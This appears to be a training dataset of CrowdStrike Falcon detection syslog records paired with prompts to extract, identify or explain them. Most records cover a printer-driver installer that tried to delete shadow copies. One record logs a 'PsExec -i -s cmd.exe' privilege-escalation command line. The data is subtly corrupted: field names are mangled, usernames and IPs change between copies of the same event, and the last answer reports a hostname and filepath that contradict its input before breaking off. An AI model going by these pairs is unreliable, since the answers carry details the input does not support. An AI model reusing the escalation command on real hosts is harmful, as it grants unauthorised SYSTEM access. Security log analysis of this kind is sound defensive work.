::: filePath=\Device\HarddiskVolume3\Program Files (x86)\epson\EPSON Advanced Printer Driver 5\TM-T88V\TM-T88V Utility\setup.exe ::: userName=janedoe ::: clientMAC=00ffc8e92fdb ::: created_at=2023-10-17T20:24:24Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-17T20:24:24Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch
{ "clienthostname": "SSTEWART-LT3.undefined", "clientmac": "00ffc8e92fdb", "filehash": "1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18", "filename": "setup.exe", "filepath": "\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe", "message": "WitFoo-Artifact ::: message={\"device_id\":\"3810ea13b98a42adb0ff227fbaf6169f\",\"timestamp\":\"2023-10-17T20:24:24Z\",\"behavior_id\":\"458\",\"filename\":\"setup.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Program Files (x86)\\\\epson\\\\EPSON Advanced Printer Driver 5\\\\TM-T88V\\\\TM-T88V Utility\\\\setup.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"C:\\\\Program Files (x86)\\\\EPSON\\\\EPSON Advanced Printer Driver 5\\\\TM-T88V\\\\TM-T88V Utility\\\\setup.exe\\\" -PSM -HIDE_PROGRESS -W32:592210 -PRD:APD\",\"scenario\":\"ransomware\",\"objective\":\"Follow Through\",\"tactic\":\"Impact\",\"tactic_id\":\"TA0040\",\"technique\":\"Inhibit System Recovery\",\"technique_id\":\"T1490\",\"display_name\":\"VolumeShadowSnapshotDeleted\",\"description\":\"A process attempted to delete a Volume Shadow Snapshot.\",\"severity\":50,\"confidence\":60,\"ioc_type\":\"\",\"ioc_value\":\"\",\"ioc_source\":\"\",\"ioc_description\":\"\",\"user_name\":\"janedoe\",\"user_id\":\"S-1-12-1-942142572-1204970278-157880471-3270697999\",\"control_graph_id\":\"ctg:3810ea13b98a42adb0ff227fbaf6169f:81604677450\",\"triggering_process_graph_id\":\"pid:3810ea13b98a42adb0ff227fbaf6169f:4594730739079\",\"sha256\":\"1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18\",\"md5\":\"eb33b049f629677d0b48ac82e1aad6d7\",\"parent_details\":{\"parent_sha256\":\"faf27799b04c2780dc06360f77d13d0656d78658a005d7e20a44d45b4b3f2235\",\"parent_md5\":\"c85df204a8fe49fc690202c5ccd27b5b\",\"parent_cmdline\":\"\\\"C:\\\\Users\\\\STEVEN~1\\\\AppData\\\\Local\\\\Temp\\\\APD5\\\\Setup.exe\\\" \",\"parent_process_graph_id\":\"pid:3810ea13b98a42adb0ff227fbaf6169f:4594712136312\"},\"pattern_disposition\":1024,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_mwayneine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":true,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=119.137.219.99 ::: fileHash=1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 ::: fileName=setup.exe ::: filePath=\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe ::: userName=janedoe ::: clientMAC=00ffc8e92fdb ::: created_at=2023-10-17T20:24:24Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-17T20:24:24Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch", "messagetype": "endpoint_protection_event", "productids": [ 7 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "severitycode": 4, "severitylabel": "warning", "sourceinfo": "unknown", "starttimeutc": "2023-10-17T20:24:24Z", "tags": [ "Crowdstrike Detection", "endpoint_protection_event" ], "streamName": "Crowdstrike Detection", "clientIP": "119.137.219.99", "userName": "janedoe" }
Create a JSON artifact from the message
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-10-17T20:24:24Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe","alleged_filetype":"exe","cmdline":"\"C:\\Program Files (x86)\\EPSON\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe\" -PSM -HIDE_PROGRESS -W32:592210 -PRD:APD","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"janedoe","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:81604677450","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594730739079","sha256":"1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18","md5":"eb33b049f629677d0b48ac82e1aad6d7","parent_details":{"parent_sha256":"faf27799b04c2780dc06360f77d13d0656d78658a005d7e20a44d45b4b3f2235","parent_md5":"c85df204a8fe49fc690202c5ccd27b5b","parent_cmdline":"\"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\APD5\\Setup.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594712136312"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mwayneine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=119.137.219.99 ::: fileHash=1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Program Files (x86)\epson\EPSON Advanced Printer Driver 5\TM-T88V\TM-T88V Utility\setup.exe ::: userName=janedoe ::: clientMAC=00ffc8e92fdb ::: created_at=2023-10-17T20:24:24Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-17T20:24:24Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch
Product: Falcon Vendor: Crowdstrike
Identify this syslog message
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-10-17T20:24:24Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe","alleged_filetype":"exe","cmdline":"\"C:\\Program Files (x86)\\EPSON\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe\" -PSM -HIDE_PROGRESS -W32:592210 -PRD:APD","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"janedoe","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:81604677450","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594730739079","sha256":"1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18","md5":"eb33b049f629677d0b48ac82e1aad6d7","parent_details":{"parent_sha256":"faf27799b04c2780dc06360f77d13d0656d78658a005d7e20a44d45b4b3f2235","parent_md5":"c85df204a8fe49fc690202c5ccd27b5b","parent_cmdline":"\"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\APD5\\Setup.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594712136312"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mwayneine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=119.137.219.99 ::: fileHash=1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Program Files (x86)\epson\EPSON Advanced Printer Driver 5\TM-T88V\TM-T88V Utility\setup.exe ::: userName=janedoe ::: clientMAC=00ffc8e92fdb ::: created_at=2023-10-17T20:24:24Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-17T20:24:24Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message: clienthostname: SSTEWART-LT3.undefined clientmac: 00ffc8e92fdb filehash: 1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 filename: setup.exe filepath: \Device\HarddiskVolume3\Program Files (x86)\epson\EPSON Advanced Printer Driver 5\TM-T88V\TM-T88V Utility\setup.exe messagetype: endpoint_protection_event productids: [7] senderhost: kafka.precinct sensitivity: normal severitycode: 4 severitylabel: warning sourceinfo: unknown starttimeutc: 2023-10-17T20:24:24Z tags: ['Crowdstrike Detection', 'endpoint_protection_event'] streamName: Crowdstrike Detection clientIP: 119.137.219.99 userName: janedoe
Explain this syslog message
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-10-17T20:24:24Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe","alleged_filetype":"exe","cmdline":"\"C:\\Program Files (x86)\\EPSON\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe\" -PSM -HIDE_PROGRESS -W32:592210 -PRD:APD","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"charlie","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:81604677450","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594730739079","sha256":"1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18","md5":"eb33b049f629677d0b48ac82e1aad6d7","parent_details":{"parent_sha256":"faf27799b04c2780dc06360f77d13d0656d78658a005d7e20a44d45b4b3f2235","parent_md5":"c85df204a8fe49fc690202c5ccd27b5b","parent_cmdline":"\"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\APD5\\Setup.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594712136312"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=248.244.6.40 ::: fileHash=1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Program Files (x86)\epson\EPSON Advanced Printer Driver 5\TM-T88V\TM-T88V Utility\setup.exe ::: userName=charlie ::: clientMAC=00ffc8e92fdb ::: created_at=2023-10-17T20:24:24Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-17T20:24:24Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch
{ "clienthostname": "SSTEWART-LT3.undefined", "clientmac": "00ffc8e92fdb", "filehash": "1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18", "filename": "setup.exe", "filepath": "\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe", "message": "WitFoo-Artifact ::: message={\"device_id\":\"3810ea13b98a42adb0ff227fbaf6169f\",\"timestamp\":\"2023-10-17T20:24:24Z\",\"behavior_id\":\"458\",\"filename\":\"setup.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Program Files (x86)\\\\epson\\\\EPSON Advanced Printer Driver 5\\\\TM-T88V\\\\TM-T88V Utility\\\\setup.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"C:\\\\Program Files (x86)\\\\EPSON\\\\EPSON Advanced Printer Driver 5\\\\TM-T88V\\\\TM-T88V Utility\\\\setup.exe\\\" -PSM -HIDE_PROGRESS -W32:592210 -PRD:APD\",\"scenario\":\"ransomware\",\"objective\":\"Follow Through\",\"tactic\":\"Impact\",\"tactic_id\":\"TA0040\",\"technique\":\"Inhibit System Recovery\",\"technique_id\":\"T1490\",\"display_name\":\"VolumeShadowSnapshotDeleted\",\"description\":\"A process attempted to delete a Volume Shadow Snapshot.\",\"severity\":50,\"confidence\":60,\"ioc_type\":\"\",\"ioc_value\":\"\",\"ioc_source\":\"\",\"ioc_description\":\"\",\"user_name\":\"charlie\",\"user_id\":\"S-1-12-1-942142572-1204970278-157880471-3270697999\",\"control_graph_id\":\"ctg:3810ea13b98a42adb0ff227fbaf6169f:81604677450\",\"triggering_process_graph_id\":\"pid:3810ea13b98a42adb0ff227fbaf6169f:4594730739079\",\"sha256\":\"1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18\",\"md5\":\"eb33b049f629677d0b48ac82e1aad6d7\",\"parent_details\":{\"parent_sha256\":\"faf27799b04c2780dc06360f77d13d0656d78658a005d7e20a44d45b4b3f2235\",\"parent_md5\":\"c85df204a8fe49fc690202c5ccd27b5b\",\"parent_cmdline\":\"\\\"C:\\\\Users\\\\STEVEN~1\\\\AppData\\\\Local\\\\Temp\\\\APD5\\\\Setup.exe\\\" \",\"parent_process_graph_id\":\"pid:3810ea13b98a42adb0ff227fbaf6169f:4594712136312\"},\"pattern_disposition\":1024,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_moscorpine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":true,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=248.244.6.40 ::: fileHash=1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 ::: fileName=setup.exe ::: filePath=\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe ::: userName=charlie ::: clientMAC=00ffc8e92fdb ::: created_at=2023-10-17T20:24:24Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-17T20:24:24Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch", "messagetype": "endpoint_protection_event", "productids": [ 7 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "severitycode": 4, "severitylabel": "warning", "sourceinfo": "unknown", "starttimeutc": "2023-10-17T20:24:24Z", "tags": [ "Crowdstrike Detection", "endpoint_protection_event" ], "streamName": "Crowdstrike Detection", "clientIP": "248.244.6.40", "userName": "charlie" }
Create a JSON artifact from the message
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-10-17T20:24:24Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe","alleged_filetype":"exe","cmdline":"\"C:\\Program Files (x86)\\EPSON\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe\" -PSM -HIDE_PROGRESS -W32:592210 -PRD:APD","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"charlie","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:81604677450","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594730739079","sha256":"1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18","md5":"eb33b049f629677d0b48ac82e1aad6d7","parent_details":{"parent_sha256":"faf27799b04c2780dc06360f77d13d0656d78658a005d7e20a44d45b4b3f2235","parent_md5":"c85df204a8fe49fc690202c5ccd27b5b","parent_cmdline":"\"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\APD5\\Setup.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594712136312"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=248.244.6.40 ::: fileHash=1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Program Files (x86)\epson\EPSON Advanced Printer Driver 5\TM-T88V\TM-T88V Utility\setup.exe ::: userName=charlie ::: clientMAC=00ffc8e92fdb ::: created_at=2023-10-17T20:24:24Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-17T20:24:24Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch
Product: Falcon Vendor: Crowdstrike
Identify this syslog message
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-10-17T20:24:24Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe","alleged_filetype":"exe","cmdline":"\"C:\\Program Files (x86)\\EPSON\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe\" -PSM -HIDE_PROGRESS -W32:592210 -PRD:APD","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"charlie","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:81604677450","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594730739079","sha256":"1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18","md5":"eb33b049f629677d0b48ac82e1aad6d7","parent_details":{"parent_sha256":"faf27799b04c2780dc06360f77d13d0656d78658a005d7e20a44d45b4b3f2235","parent_md5":"c85df204a8fe49fc690202c5ccd27b5b","parent_cmdline":"\"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\APD5\\Setup.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594712136312"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=248.244.6.40 ::: fileHash=1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Program Files (x86)\epson\EPSON Advanced Printer Driver 5\TM-T88V\TM-T88V Utility\setup.exe ::: userName=charlie ::: clientMAC=00ffc8e92fdb ::: created_at=2023-10-17T20:24:24Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-17T20:24:24Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message: clienthostname: SSTEWART-LT3.undefined clientmac: 00ffc8e92fdb filehash: 1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 filename: setup.exe filepath: \Device\HarddiskVolume3\Program Files (x86)\epson\EPSON Advanced Printer Driver 5\TM-T88V\TM-T88V Utility\setup.exe messagetype: endpoint_protection_event productids: [7] senderhost: kafka.precinct sensitivity: normal severitycode: 4 severitylabel: warning sourceinfo: unknown starttimeutc: 2023-10-17T20:24:24Z tags: ['Crowdstrike Detection', 'endpoint_protection_event'] streamName: Crowdstrike Detection clientIP: 248.244.6.40 userName: charlie
Explain this syslog message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T18:24:34Z","template_instance_id":"1384","behavior_id":"10447","filename":"PsExec.exe","filepath":"\\Device\\HarddiskVolume1\\Users\\charlie\\Downloads\\PSTools\\PsExec.exe","alleged_filetype":"exe","cmdline":"\"C:\\Users\\charlie\\Downloads\\PSTools\\PsExec.exe\" -i -s cmd.exe","scenario":"suspicious_activity","objective":"Gain Access","tactic":"Privilege Escalation","tactic_id":"TA0004","technique":"Abuse Elevation Control Mechanism","technique_id":"T1548","display_name":"SuspiciousPrivEsc","description":"A process has escalated privileges, this could be as a result of an adversary's attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.","severity":30,"confidence":80,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"charlie","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674313837342","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675598189738","sha256":"078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b","md5":"24a648a48741b1ac809e47b9543c6f12","parent_details":{"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675576884426"},"pattern_disposition":0,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=185.193.34.232 ::: fileHash=078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b ::: fileName=PsExec.exe ::: filePath=\Device\HarddiskVolume1\Users\charlie\Downloads\PSTools\PsExec.exe ::: userName=charlie ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T18:24:34Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T18:24:34Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch
{ "clienthostname": "NVIINFRDEVAPP02.devnvi.paygoint.com", "clientmac": "0edeb6ae9241", "filehash": "078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b", "filename": "PsExec.exe", "filepath": "\\Device\\HarddiskVolume1\\Users\\INFRDEV-pentest\\Downloads\\PSTools\\PsExec.exe", "message": "WitFoo-Artifact ::: message={\"device_id\":\"dfbb62cf44104a3d85ad81cfd5bebb3c\",\"timestamp\":\"2023-08-29T18:24:34Z\",\"template_instance_id\":\"1384\",\"behavior_id\":\"10447\",\"filename\":\"PsExec.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume1\\\\Users\\\\charlie\\\\Downloads\\\\PSTools\\\\PsExec.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"C:\\\\Users\\\\charlie\\\\Downloads\\\\PSTools\\\\PsExec.exe\\\" -i -s cmd.exe\",\"scenario\":\"suspicious_activity\",\"objective\":\"Gain Access\",\"tactic\":\"Privilege Escalation\",\"tactic_id\":\"TA0004\",\"technique\":\"Abuse Elevation Control Mechanism\",\"technique_id\":\"T1548\",\"display_name\":\"SuspiciousPrivEsc\",\"description\":\"A process has escalated privileges, this could be as a result of an adversary's attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.\",\"severity\":30,\"confidence\":80,\"ioc_type\":\"\",\"ioc_value\":\"\",\"ioc_source\":\"\",\"ioc_description\":\"\",\"user_name\":\"charlie\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-94611\",\"control_graph_id\":\"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674313837342\",\"triggering_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675598189738\",\"sha256\":\"078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b\",\"md5\":\"24a648a48741b1ac809e47b9543c6f12\",\"parent_details\":{\"parent_sha256\":\"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c\",\"parent_md5\":\"7353f60b1739074eb17c5f4dddefe239\",\"parent_cmdline\":\"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" 